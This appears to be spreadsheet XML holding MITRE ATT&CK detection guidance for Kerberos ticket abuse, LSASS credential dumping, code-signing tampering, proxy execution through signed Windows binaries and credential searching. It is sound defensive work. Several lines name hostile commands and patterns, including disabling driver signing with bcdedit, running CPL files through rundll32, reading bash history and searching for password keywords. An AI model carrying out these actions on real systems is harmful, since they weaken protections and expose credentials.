Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018) (Citation: AdSecurity Cracking Kerberos Dec 2015)
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as [Mimikatz](https://attack.mitre.org/software/S0002) access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.
Monitor for unusual processes accessing &lt;code&gt;secrets.ldb&lt;/code&gt; and &lt;code&gt;.secrets.mkey&lt;/code&gt; located in &lt;code&gt;/var/lib/sss/secrets/&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4768 and 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17], pre-authentication not required [Type: 0x0]).(Citation: AdSecurity Cracking Kerberos Dec 2015)(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: Microsoft 4768 TGT 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4672, 4634), RC4 encryption within TGTs, and TGS requests without preceding TGT requests.(Citation: ADSecurity Kerberos and KRBTGT)(Citation: CERT-EU Golden Ticket Protection)(Citation: Stealthbits Detect PtT 2019)
Monitor the lifetime of TGT tickets for values that differ from the default domain duration.(Citation: Microsoft Kerberos Golden Ticket)
Monitor for indications of [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003) being used to move laterally. 
</t>
  </si>
  <si>
    <t>Enable Audit Kerberos Service Ticket Operations to log Kerberos TGS service ticket requests. Particularly investigate irregular patterns of activity (ex: accounts making numerous requests, Event ID 4769, within a small time frame, especially if they also request RC4 encryption [Type 0x17]).(Citation: Microsoft Detecting Kerberoasting Feb 2018)(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) 
Monitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.</t>
  </si>
  <si>
    <t xml:space="preserve">Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017) A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure "Hide Microsoft Entries" and "Hide Windows Entries" are both deselected.(Citation: SpectorOps Subverting Trust Sept 2017) 
Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. </t>
  </si>
  <si>
    <t>Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to modify the code signing policy of a system, such as &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt;.(Citation: Microsoft TESTSIGNING Feb 2021) Consider monitoring for modifications made to Registry keys associated with code signing policies, such as &lt;code&gt;HKCU\Software\Policies\Microsoft\Windows NT\Driver Signing&lt;/code&gt;. Modifications to the code signing policy of a system are likely to be rare.</t>
  </si>
  <si>
    <t>The removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. Monitor and investigate attempts to modify extended file attributes with utilities such as &lt;code&gt;xattr&lt;/code&gt;. Built-in system utilities may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Monitor software update frameworks that strip the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag when performing updates. 
Review &lt;code&gt;false&lt;/code&gt; values under the &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; entry in an application's &lt;code&gt;Info.plist&lt;/code&gt; file (required by every application). &lt;code&gt;false&lt;/code&gt; under &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; indicates that an application does not use the quarantine flag. Unsandboxed applications with an unspecified &lt;code&gt;LSFileQuarantineEnabled&lt;/code&gt; entry will default to not setting the quarantine flag. 
QuarantineEvents is a SQLite database containing a list of all files assigned the &lt;code&gt;com.apple.quarantine&lt;/code&gt; attribute, located at &lt;code&gt;~/Library/Preferences/com.apple.LaunchServices.QuarantineEventsV2&lt;/code&gt;. Each event contains the corresponding UUID, timestamp, application, Gatekeeper score, and decision if it was allowed.(Citation: TheEclecticLightCompany Quarantine and the flag)</t>
  </si>
  <si>
    <t>A system's root certificates are unlikely to change frequently. Monitor new certificates installed on a system that could be due to malicious activity.(Citation: SpectorOps Code Signing Dec 2017) Check pre-installed certificates on new systems to ensure unnecessary or suspicious certificates are not present. Microsoft provides a list of trustworthy root certificates online and through authroot.stl.(Citation: SpectorOps Code Signing Dec 2017) The Sysinternals Sigcheck utility can also be used (&lt;code&gt;sigcheck[64].exe -tuv&lt;/code&gt;) to dump the contents of the certificate store and list valid certificates not rooted to the Microsoft Certificate Trust List.(Citation: Microsoft Sigcheck May 2017)
Installed root certificates are located in the Registry under &lt;code&gt;HKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Root\Certificates\&lt;/code&gt; and &lt;code&gt;[HKLM or HKCU]\Software[\Policies\]\Microsoft\SystemCertificates\Root\Certificates\&lt;/code&gt;. There are a subset of root certificates that are consistent across Windows systems and can be used for comparison:(Citation: Tripwire AppUNBlocker)
* 18F7C1FCC3090203FD5BAA2F861A754976C8DD25
* 245C97DF7514E7CF2DF8BE72AE957B9E04741E85
* 3B1EFD3A66EA28B16697394703A72CA340A05BD5
* 7F88CD7223F3C813818C994614A89C99FA3B5247
* 8F43288AD272F3103B6FB1428485EA3014C0BCFE
* A43489159A520F0D93D032CCAF37E7FE20A8B419
* BE36A4562FB2EE05DBB3D32323ADF445084ED656
* CDD4EEAE6000AC7F40C3802C171E30148030C072</t>
  </si>
  <si>
    <t>Monitor compressed/archive and image files downloaded from the Internet as the contents may not be tagged with the MOTW. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.(Citation: Disable automount for ISO)</t>
  </si>
  <si>
    <t>Periodically baseline registered SIPs and trust providers (Registry entries and files on disk), specifically looking for new, modified, or non-Microsoft entries. (Citation: SpectorOps Subverting Trust Sept 2017)
Enable CryptoAPI v2 (CAPI) event logging (Citation: Entrust Enable CAPI2 Aug 2017) to monitor and analyze error events related to failed trust validation (Event ID 81, though this event can be subverted by hijacked trust provider components) as well as any other provided information events (ex: successful validations). Code Integrity event logging may also provide valuable indicators of malicious SIP or trust provider loads, since protected processes that attempt to load a maliciously-crafted trust validation component will likely fail (Event ID 3033). (Citation: SpectorOps Subverting Trust Sept 2017)
Utilize Sysmon detection rules and/or enable the Registry (Global Object Access Auditing) (Citation: Microsoft Registry Auditing Aug 2016) setting in the Advanced Security Audit policy to apply a global system access control list (SACL) and event auditing on modifications to Registry values (sub)keys related to SIPs and trust providers: (Citation: Microsoft Audit Registry July 2012)
* HKLM\SOFTWARE\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID
* HKLM\SOFTWARE\Microsoft\Cryptography\Providers\Trust
* HKLM\SOFTWARE\WOW6432Node\Microsoft\Cryptography\Providers\Trust
**Note:** As part of this technique, adversaries may attempt to manually edit these Registry keys (ex: Regedit) or utilize the legitimate registration process using [Regsvr32](https://attack.mitre.org/techniques/T1218/010). (Citation: SpectorOps Subverting Trust Sept 2017)
Analyze Autoruns data for oddities and anomalies, specifically malicious files attempting persistent execution by hiding within auto-starting locations. Autoruns will hide entries signed by Microsoft or Windows by default, so ensure “Hide Microsoft Entries” and “Hide Windows Entries” are both deselected. (Citation: SpectorOps Subverting Trust Sept 2017)</t>
  </si>
  <si>
    <t>Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. Perform physical inspection of hardware to look for potential tampering.</t>
  </si>
  <si>
    <t>Perform physical inspection of hardware to look for potential tampering. Perform integrity checking on pre-OS boot mechanisms that can be manipulated for malicious purposes.</t>
  </si>
  <si>
    <t xml:space="preserve">Use verification of distributed binaries through hash checking or other integrity checking mechanisms. Scan downloads for malicious signatures and attempt to test software and updates prior to deployment while taking note of potential suspicious activity. </t>
  </si>
  <si>
    <t>Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.
Monitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.</t>
  </si>
  <si>
    <t>Use process monitoring to detect and analyze the execution and arguments of CMSTP.exe. Compare recent invocations of CMSTP.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity.
Sysmon events can also be used to identify potential abuses of CMSTP.exe. Detection strategy may depend on the specific adversary procedure, but potential rules include: (Citation: Endurant CMSTP July 2018)
* To detect loading and execution of local/remote payloads - Event 1 (Process creation) where ParentImage contains CMSTP.exe and/or Event 3 (Network connection) where Image contains CMSTP.exe and DestinationIP is external.
* To detect [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) via an auto-elevated COM interface - Event 10 (ProcessAccess) where CallTrace contains CMLUA.dll and/or Event 12 or 13 (RegistryEvent) where TargetObject contains CMMGR32.exe. Also monitor for events, such as the creation of processes (Sysmon Event 1), that involve auto-elevated CMSTP COM interfaces such as CMSTPLUA (3E5FC7F9-9A51-4367-9063-A120244FBEC7) and CMLUAUTIL (3E000D72-A845-4CD9-BD83-80C07C3B881F).</t>
  </si>
  <si>
    <t>Monitor and analyze the execution and arguments of hh.exe. (Citation: MsitPros CHM Aug 2017) Compare recent invocations of hh.exe with prior history of known good arguments to determine anomalous and potentially adversarial activity (ex: obfuscated and/or malicious commands). Non-standard process execution trees may also indicate suspicious or malicious behavior, such as if hh.exe is the parent process for suspicious processes and activity relating to other adversarial techniques.
Monitor presence and use of CHM files, especially if they are not typically used within an environment.</t>
  </si>
  <si>
    <t>Monitor and analyze activity related to items associated with CPL files, such as the control.exe and the &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;ControlRunDLLAsUser&lt;/code&gt; API functions in shell32.dll. When executed from the command line or clicked, control.exe will execute the CPL file (ex: &lt;code&gt;control.exe file.cpl&lt;/code&gt;) before [Rundll32](https://attack.mitre.org/techniques/T1218/011) is used to call the CPL's API functions (ex: &lt;code&gt;rundll32.exe shell32.dll,Control_RunDLL file.cpl&lt;/code&gt;). CPL files can be executed directly via the CPL API function with just the latter [Rundll32](https://attack.mitre.org/techniques/T1218/011) command, which may bypass detections and/or execution filters for control.exe.(Citation: TrendMicro CPL Malware Jan 2014)
Inventory Control Panel items to locate unregistered and potentially malicious files present on systems:
* Executable format registered Control Panel items will have a globally unique identifier (GUID) and registration Registry entries in &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel\NameSpace&lt;/code&gt; and &lt;code&gt;HKEY_CLASSES_ROOT\CLSID\{GUID}&lt;/code&gt;. These entries may contain information about the Control Panel item such as its display name, path to the local file, and the command executed when opened in the Control Panel. (Citation: Microsoft Implementing CPL)
* CPL format registered Control Panel items stored in the System32 directory are automatically shown in the Control Panel. Other Control Panel items will have registration entries in the &lt;code&gt;CPLs&lt;/code&gt; and &lt;code&gt;Extended Properties&lt;/code&gt; Registry keys of &lt;code&gt;HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Control Panel&lt;/code&gt;. These entries may include information such as a GUID, path to the local file, and a canonical name used to launch the file programmatically (&lt;code&gt; WinExec("c:\windows\system32\control.exe {Canonical_Name}", SW_NORMAL);&lt;/code&gt;) or from a command line (&lt;code&gt;control.exe /name {Canonical_Name}&lt;/code&gt;).(Citation: Microsoft Implementing CPL)
* Some Control Panel items are extensible via Shell extensions registered in &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Controls Folder\{name}\Shellex\PropertySheetHandlers&lt;/code&gt; where {name} is the predefined name of the system item.(Citation: Microsoft Implementing CPL)
Analyze new Control Panel items as well as those present on disk for malicious content. Both executable and CPL formats are compliant Portable Executable (PE) images and can be examined using traditional tools and methods, pending anti-reverse-engineering techniques.(Citation: TrendMicro CPL Malware Jan 2014)</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor processes and command-line parameters for suspicious or malicious use of MMC. Since MMC is a signed Windows binary, verify use of MMC is legitimate and not malicious. 
Monitor for creation and use of .msc files. MMC may legitimately be used to call Microsoft-created .msc files, such as &lt;code&gt;services.msc&lt;/code&gt; or &lt;code&gt;eventvwr.msc&lt;/code&gt;. Invoking non-Microsoft .msc files may be an indicator of malicious activity. </t>
  </si>
  <si>
    <t>Monitor the execution and arguments of mavinject.exe. Compare recent invocations of mavinject.exe with prior history of known good arguments and injected DLLs to determine anomalous and potentially adversarial activity.
Adversaries may rename abusable binaries to evade detections, but the argument &lt;code&gt;INJECTRUNNING&lt;/code&gt; is required for mavinject.exe to perform [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001) and may therefore be monitored to alert malicious activity.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of msiexec.exe. Compare recent invocations of msiexec.exe with prior history of known good arguments and executed MSI files or DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of msiexec.exe may also be useful in determining the origin and purpose of the MSI files or DLLs being executed.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of odbcconf.exe may also be useful in determining the origin and purpose of the DLL being loaded.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. (Citation: Carbon Black Squiblydoo Apr 2016)</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity.
Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. Analyzing DLL exports and comparing to runtime arguments may be useful in uncovering obfuscated function calls.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of verclsid.exe. Compare recent invocations of verclsid.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the invocation of verclsid.exe may also be useful in determining the origin and purpose of the payload being executed. Depending on the environment, it may be unusual for verclsid.exe to have a parent process of a Microsoft Office product. It may also be unusual for verclsid.exe to have any child processes or to make network connections or file modifications.</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather  detailed system information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
In cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system location information. Remote access tools with built-in features may interact directly with the Windows API, such as calling &lt;code&gt; GetLocaleInfoW&lt;/code&gt; to gather information.(Citation: FBI Ragnar Locker 2020)
Monitor traffic flows to geo-location service provider sites, such as ip-api and ipinfo.</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system language information. This may include calls to various API functions and interaction with system configuration settings such as the Windows Registry.</t>
  </si>
  <si>
    <t>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
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use  commands being run by non-standard users from non-standard locations.  Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to check Internet connectivity.</t>
  </si>
  <si>
    <t>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
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to gather system and network information with built-in features native to the network device platform.  Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.</t>
  </si>
  <si>
    <t>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
Monitor processes and command-line arguments for actions that could be taken to gather system information related to services.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t>
  </si>
  <si>
    <t>Monitor for command line invocations of tools capable of modifying services that doesn’t correspond to normal usage patterns and known software, patch cycles, etc. Also monitor for changes to executables and other files associated with services. Changes to Windows services may also be reflected in the Registry.</t>
  </si>
  <si>
    <t>Every Launch Agent and Launch Daemon must have a corresponding plist file on disk which can be monitored. Monitor for recently modified or created plist files with a significant change to the executable path executed with the command-line &lt;code&gt;launchctl&lt;/code&gt; command. Plist files are located in the root, system, and users &lt;code&gt;/Library/LaunchAgents&lt;/code&gt; or &lt;code&gt;/Library/LaunchDaemons&lt;/code&gt; folders. 
Monitor command-line execution of the &lt;code&gt;launchctl&lt;/code&gt; command immediately followed by abnormal network connections. [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s with executable paths pointing to &lt;code&gt;/tmp&lt;/code&gt; and &lt;code&gt;/Shared&lt;/code&gt; folders locations are potentially suspicious. 
When removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure the services are unloaded prior to deleting plist files.</t>
  </si>
  <si>
    <t>Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006. Unexpected or unauthorized commands from network cli on network devices may also be associated with shutdown/reboot, e.g. the &lt;code&gt;reload&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Command-line interface monitoring may be useful to detect instances of net.exe or other command-line utilities being used to gather system time or time zone. Methods of detecting API use for gathering this information are likely less useful due to how often they may be used by legitimate software.</t>
  </si>
  <si>
    <t>Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.
Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.</t>
  </si>
  <si>
    <t>Analyze process behavior to determine if user document applications (such as Office) are performing actions, such as opening network connections, reading files, spawning abnormal child processes (ex: [PowerShell](https://attack.mitre.org/techniques/T1059/001)), or other suspicious actions that could relate to post-compromise behavior.
Monitor .rtf files for strings indicating the &lt;code&gt;&amp;#42;\template&lt;/code&gt; control word has been modified to retrieve a URL resource, such as &lt;code&gt;&amp;#42;\template http&lt;/code&gt; or &lt;code&gt;&amp;#42;\template \u-&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.
The Wake-on-LAN magic packet consists of 6 bytes of &lt;code&gt;FF&lt;/code&gt; followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)</t>
  </si>
  <si>
    <t>Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.</t>
  </si>
  <si>
    <t>Identify running processes with raw sockets. Ensure processes listed have a need for an open raw socket and are in accordance with enterprise policy.(Citation: crowdstrike bpf socket filters)</t>
  </si>
  <si>
    <t>Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. 
In AWS, sharing an Elastic Block Store (EBS) snapshot, either with specified users or publicly, generates a ModifySnapshotAttribute event in CloudTrail logs.(Citation: AWS EBS Snapshot Sharing) Similarly, in Azure, creating a Shared Access Signature (SAS) URI for a Virtual Hard Disk (VHS) snapshot generates a "Get Snapshot SAS URL" event in Activity Logs.(Citation: Azure Blob Snapshots)(Citation: Azure Shared Access Signature)</t>
  </si>
  <si>
    <t>Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of MSBuild.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.</t>
  </si>
  <si>
    <t>Establish monitoring for activity conducted by second and third party providers and other trusted entities that may be leveraged as a means to gain access to the network. Depending on the type of relationship, an adversary may have access to significant amounts of information about the target before conducting an operation, especially if the trusted relationship is based on IT services. Adversaries may be able to act quickly towards an objective, so proper monitoring for behavior related to Credential Access, Lateral Movement, and Collection will be important to detect the intrusion.</t>
  </si>
  <si>
    <t>While detecting adversaries accessing credentials may be difficult without knowing they exist in the environment, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.
Monitor for suspicious file access activity, specifically indications that a process is reading multiple files in a short amount of time and/or using command-line arguments  indicative of searching for credential material (ex: regex patterns). These may be indicators of automated/scripted credential access behavior.
Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.
Additionally, monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>Monitoring when the user's &lt;code&gt;.bash_history&lt;/code&gt; is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like &lt;code&gt;cat ~/.bash_history&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor access to the Instance Metadata API and look for anomalous queries.
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>Establish centralized logging for the activity of container and Kubernetes cluster components. Monitor logs for actions that could be taken to gather credentials to container and cloud infrastructure, including the use of discovery API calls by new or unexpected users and APIs that access Docker logs.
It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).</t>
  </si>
  <si>
    <t>While detecting adversaries accessing these files may be difficult without knowing they exist in the first place, it may be possible to detect adversary use of credentials they have obtained. Monitor the command-line arguments of executing processes for suspicious words or regular expressions that may indicate searching for a password (for example: password, pwd, login, secure, or credentials). See [Valid Accounts](https://attack.mitre.org/techniques/T1078) for more information.</t>
  </si>
  <si>
    <t>Monitor processes for applications that can be used to query the Registry, such as [Reg](https://attack.mitre.org/software/S0075), and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.</t>
  </si>
  <si>
    <t>Monitor for attempts to access SYSVOL that involve searching for XML files. 
Deploy a new XML file with permissions set to Everyone:Deny and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords in SYSVOL)</t>
  </si>
  <si>
    <t>Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.</t>
  </si>
  <si>
    <t>Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).</t>
  </si>
  <si>
    <t>Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. Additionally, administrators should review logs for calls to the AWS Security Token Service (STS) and usage of GCP service accounts in order to identify anomalous actions.(Citation: AWS Logging IAM Calls)(Citation: GCP Monitoring Service Account Usage)</t>
  </si>
  <si>
    <t>Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.
Event ID 4768 and 4769 will also be generated on the Domain Controller when a user requests a new ticket granting ticket or service ticket. These events combined with the above activity may be indicative of an overpass the hash attempt.(Citation: Stealthbits Overpass-the-Hash)</t>
  </si>
  <si>
    <t>Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
Event ID 4769 is generated on the Domain Controller when using a golden ticket after the KRBTGT password has been reset twice, as mentioned in the mitigation section. The status code 0x1F indicates the action has failed due to "Integrity check on decrypted field failed" and indicates misuse by a previously invalidated golden ticket.(Citation: CERT-EU Golden Ticket Protection)</t>
  </si>
  <si>
    <t>Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.</t>
  </si>
  <si>
